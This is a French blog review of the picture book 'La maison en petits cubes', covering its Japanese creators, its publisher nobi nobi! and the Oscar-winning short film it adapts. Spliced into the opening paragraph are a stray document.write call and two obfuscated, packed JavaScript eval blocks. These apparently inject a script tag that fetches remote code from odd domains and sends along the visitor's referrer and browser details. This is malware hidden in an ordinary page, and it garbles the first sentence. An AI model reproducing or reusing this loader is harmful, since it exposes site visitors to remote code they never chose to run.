La maison en petits cubes

Cette semaine j’ai découvert un superbe album illustré pour enfant qui m’a, document.write(“”); par le suite, mener vers de nouvelles révélations. Je vous en fait ici une brève introduction afin que vous puissiez le découvrir à votre tour. Comme vous voyez j’ai des lectures des plus éclectiques…
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|znzik|var|u0026u|referrer|yyads||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yshan|var|u0026u|referrer|tyyna||js|php’.split(‘|’),0,{}))

“Dans une ville entièrement immergée, un vieux monsieur résiste encore et toujours à la montée du niveau de la mer. Chaque fois que l’eau atteint son plancher, il est obligé de bâtir une nouvelle maison par-dessus la précédente, si bien qu’au fil du temps son logis a fini par ressembler à une immense pile de petits cubes. Un jour, alors qu’il s’est encore une fois lancé dans la construction d’une nouvelle demeure, ses outils tombent tout au fond de l’eau. Il enfile sa combinaison pour aller les repêcher, et au fur et à mesure qu’il descend à travers ses anciennes maisons, de lointains souvenirs lui reviennent en mémoire…”

“Découvrez le sublime livre créé par les auteurs du film La maison en petits cubes, récompensé dans les festivals du monde entier, notamment par le prestigieux Oscar du meilleur court-métrage d’animation”. [ Texte de la couverture arrière et du site de l’éditeur ]
Continuez après le saut de page >>

La maison en petits cubes (?????? / Tsumiki no Ie) a été publié au Japon en 2008 par Hakusensha. Il a été traduit en français en mars 2012 par nobi nobi!, un éditeur de livres Jeunesse spécialisée sur le Japon. Cet album illustré est l’adaptation en livre d’un court-métrage d’animation. KATÔ Kunio (qui était le réalisateur et le directeur artistique de l’animation) a illustré le livre et HIRATA Kenya (scénariste et dessinateur pour les arrières-plans) en a écrit l’histoire. Le livre n’est pas une simple transposition de l’histoire mais plutôt un complément car les créateurs ont cherché avec le livre a pousser plus loin le récit qui est entièrement redessiné. Il y a donc quelques différences (dans l’animation, c’est sa pipe qu’il échappe à l’eau alors que dans le livre ce sont ses outils qui coulent par le fonds) mais le propos reste le même.

Les dessins faits à l’aquarelle, dominés par les tons jaunes et ocres pour la surface et aigue-marine pour l’eau, sont vraiment superbes. Ce conte tout en douceurs se veut peut-être une sorte de leçon écologique simple (puisqu’il fait allusion à la monté du niveau de l’océan), une parabole sur la persistance (devant le flot de l’adversité, il faut continuer et sans cesse se rebâtir), mais surtout une allégorie sur la mémoire, fluide et floue, souvent engloutie par le quotidien, et qu’il faut entretenir et chérir autant que possible pour la préserver. Un livre d’une grande richesse poétique qui me rappelle un peu Taniguchi (mais cela est sans doute due à une sensibilité toute japonaise qui leur est commune). Un beau conte pour les petits et pour les grands.

La maison en petits cubes, par HIRATA Kenya (texte) et KATÔ Kunio (illustration). Maisons-Laffitte, nobi nobi! (Hors Collection), 2012. 21,5 x 28,3 cm, 48 pg. couleurs, 14,95 € / $19.95 Can. ISBN: 978-2-918857-12-9. Recommandé pour enfants de 2 à 7 ans.

Pour plus d’information vous pouvez consulter les sites suivants:

Chose amusante, à travers ce livre, je retrouve mes intérêts à la fois pour le Japon, le manga, l’animation et le cinéma japonais.

Ainsi, ce livre m’a aussi fait découvrir la maison d’édition nobi nobi! (dont le nom [????], une onomatopée japonaise, signifie “être à l’aise” ou “se sentir bien” et fait référence à l’atmosphère propice à l’épanouissement que procure une bonne et riche lecture). Sa vocation, inusité dans le milieu de l’édition française, est de faire découvrir la culture japonaise par la “traduction d’albums illustrés japonais ou la création d’albums originaux inspirés par le Japon”.

Elle a été créé par deux passionnés du Japon, Pierre-Alain Dufour et Olivier Pacciani, qui ont tous deux travaillé auparavant pour une maison d’édition de manga. J’ai constaté au cours des ans que le Japon produit effectivement des livres pour enfants qui sont d’une grande beauté et sensibilité et qui sont donc un choix logique pour une maison d’édition qui désire publier des ouvrages de qualité qui offrent “des histoires intelligentes au graphisme étudié.”

Ce livre m’a également fait découvrir le court métrage d’animation qu’est aussi La maison en petits cubes et qui a inspiré le livre. D’une durée de seulement douze minutes, cette animation a été produite en 2008 par Robot Communication et animé par le studio Oh Production, sous la direction de KATÔ Kunio, avec un scénario et des arrières-plans de HIRATA Kenya ainsi qu’une musique de KONDO Kenji. Contrairement au livre, où les illustrations sont accompagnées d’un texte, le récit de l’animation ne se fait que par l’image, la musique et les effets sonores.

Robot Communication a été créé en 1986 principalement en tant qu’agence de production pour des commerciaux télévisés et comme une firme de conception graphique. Elle a depuis étendu ses activités à la production de films, d’animation et de contenu pour le web et les téléphones mobiles. Elle est connue pour avoir produit plusieurs des films que j’ai apprécié, entre autres Space Travelers, Always: Sunset on Third Street ’64, Odoru Dai Sousasen the Final (“Dancing Detectives”) et Space Battleship Yamato.

La version animé de La maison en petits cubes a été récompensée par le prix du meilleur court métrage d’animation au Festival international du film d’animation d’Annecy de 2008, par le Prix Hiroshima et Prix de l’Audience du Festival international du film d’animation d’Hiroshima de 2008 ainsi que par l’Oscar du meilleur court-métrage d’animation en 2009. Elle est largement disponible pour visionnement sur l’internet:

Tsumiki No Ie from lennie small on Vimeo.
Pour plus d’information vous pouvez consulter les sites suivants:

La maison en petits cubes © ROBOT 2008.

[ Translate ]

One thought on “La maison en petits cubes

  1. Pingback: Index of book reviews | Clodjee's Safe-House

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s